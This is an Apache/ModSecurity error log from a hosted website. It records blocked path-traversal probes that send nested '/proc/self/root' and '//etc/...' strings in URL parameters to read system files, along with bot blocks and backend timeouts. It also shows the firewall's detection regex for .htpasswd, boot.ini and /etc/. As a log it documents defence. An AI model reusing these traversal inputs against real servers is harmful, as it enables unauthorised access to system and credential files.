[Tue Mar 17 23:01:27.252104 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:54394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHd-w_le52K8_3pV2AcQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 23:01:36.137894 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:01:57.533527 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:54410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHlSmAPhZkrhU8w4kUegAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:01:58.057805 2026] [proxy_fcgi:error] [pid 16560:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45066] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:02:10.437645 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.243.128:59108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHohj0p0SRWAqcjGGtqAAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:02:19.121786 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:02:41.078023 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:02:48.731667 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:53790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHyNY0UrI5A3LftIwyMAAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:02:50.938424 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:47352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHyuyqAr6etmhZHNpZjgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:03:04.125818 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45920] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:03:26.123266 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:03:47.133854 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46562] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:04:06.011816 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.244.43:42322] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboIFcdf6f5d65gmYZRy6AAAAsQ"]
[Tue Mar 17 23:04:09.140358 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46900] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:04:13.870524 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:53756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboIHSmAPhZkrhU8w4kUuwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:04:30.033834 2026] [proxy_fcgi:error] [pid 2598:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:04:45.528185 2026] [:error] [pid 16560:tid 140411641214720] [client 74.7.228.61:57572] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboIPa6gUSg3B_dEMdIaJgAAAcw"]
[Tue Mar 17 23:04:52.133776 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:05:13.049829 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47896] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:05:35.053862 2026] [proxy_fcgi:error] [pid 11816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:05:57.117836 2026] [proxy_fcgi:error] [pid 16560:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48644] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:06:19.133509 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49026] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:06:41.125835 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:07:02.130482 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49678] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:07:23.137769 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50002] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:07:44.057839 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:08:06.122814 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50730] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:08:27.137844 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:08:49.160164 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:09:07.972678 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.244.43:55014] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboJQwkwaGbbGflqUZC3dQAAAMo"]
[Tue Mar 17 23:09:11.134356 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51774] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:09:31.734970 2026] [:error] [pid 19507:tid 140411599251200] [client 216.73.216.191:39999] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboJW9Y0UrI5A3LftIwyjAAAAZE"]
[Tue Mar 17 23:09:33.134200 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:09:48.071852 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.228.61:46578] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboJbOw_le52K8_3pV2A7gAAAgM"]
[Tue Mar 17 23:09:54.121317 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52514] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:10:08.982965 2026] [core:alert] [pid 17653:tid 140411683178240] [client 74.7.241.31:56960] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/kbd/keymaps/legacy
[Tue Mar 17 23:10:16.057869 2026] [proxy_fcgi:error] [pid 15051:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:10:40.133771 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53262] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:11:06.113821 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53614] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:11:15.101309 2026] [core:alert] [pid 26799:tid 140411716749056] [client 74.7.243.128:41998] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib
[Tue Mar 17 23:11:28.053811 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:11:51.129808 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:12:14.113936 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:12:29.526950 2026] [:error] [pid 15826:tid 140411540502272] [client 216.73.216.191:20196] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKDeoXxyEfFpUF8f8RbQAAAVg"]
[Tue Mar 17 23:12:34.951549 2026] [:error] [pid 16560:tid 140411741927168] [client 216.73.216.191:15720] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKEq6gUSg3B_dEMdIa7QAAAcA"]
[Tue Mar 17 23:12:37.121565 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54832] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:12:41.647187 2026] [:error] [pid 17887:tid 140411708356352] [client 216.73.216.191:49436] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKGQkwaGbbGflqUZC3vQAAAMQ"]
[Tue Mar 17 23:12:57.727065 2026] [:error] [pid 16560:tid 140411683178240] [client 216.73.216.191:59217] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKKK6gUSg3B_dEMdIa9QAAAcc"]
[Tue Mar 17 23:12:59.125819 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:13:02.905811 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:32019] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKLta6ubjKNq_cu4Y5_QAAA0Y"]
[Tue Mar 17 23:13:04.796558 2026] [:error] [pid 15826:tid 140411716749056] [client 216.73.216.191:43666] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKMOoXxyEfFpUF8f8RegAAAUM"]
[Tue Mar 17 23:13:05.245899 2026] [:error] [pid 31803:tid 140411725141760] [client 216.73.216.191:35846] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKMeyqAr6etmhZHNpaIwAAAEI"]
[Tue Mar 17 23:13:19.198224 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:23091] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 23:13:22.125847 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:13:42.248307 2026] [:error] [pid 15051:tid 140411733534464] [client 216.73.216.191:60469] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKVimAPhZkrhU8w4kVMwAAAIE"]
[Tue Mar 17 23:13:44.131303 2026] [proxy_fcgi:error] [pid 16560:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55790] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:13:45.668011 2026] [:error] [pid 31803:tid 140411632822016] [client 216.73.216.191:33724] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboKWeyqAr6etmhZHNpaMwAAAE0"]
[Tue Mar 17 23:14:06.133778 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56116] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:14:08.462207 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.244.43:45926] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboKcCmAPhZkrhU8w4kVNwAAAJA"]
[Tue Mar 17 23:14:30.121863 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56406] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:14:50.206693 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.228.61:41338] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboKmtY0UrI5A3LftIwy4AAAAYw"]
[Tue Mar 17 23:14:54.125888 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56722] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:15:17.121778 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57262] AH01075: Error dispatching request to : (polling)
